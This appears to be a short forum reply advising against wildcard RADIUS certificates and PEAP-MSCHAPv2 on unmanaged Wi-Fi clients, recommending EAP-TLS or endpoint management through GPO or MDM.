First to be sure you dont use wildcard certificaties (*.domain.com). Some operatingsystems like Windows dont accept wildcard radius certs.
Second, when you uses PEAP-MSCHAPv2 every first time the cliënt have to trust the server radius certificatie, because the cliënt dont ask for it like a webinterface http domainname request. The cliënt dont expext the server certificate. Yes it is valid by the external CA but the cliënt dont trust it the first connection because it didnt ask for it.
Third. PEAP-MSCHAPv2 is unsecure when you dont strictly managed the endpoints. If a cliënt can accept an unknown server certificate the inner MSCHAPv2 hash can be drain into hackers hand. MSCHAPv2 can be easly decode by a hacker to get your domain credentials.
So please use EAP-TLS if even possible or strictly manage your endpoints by a GPO policy or MDM.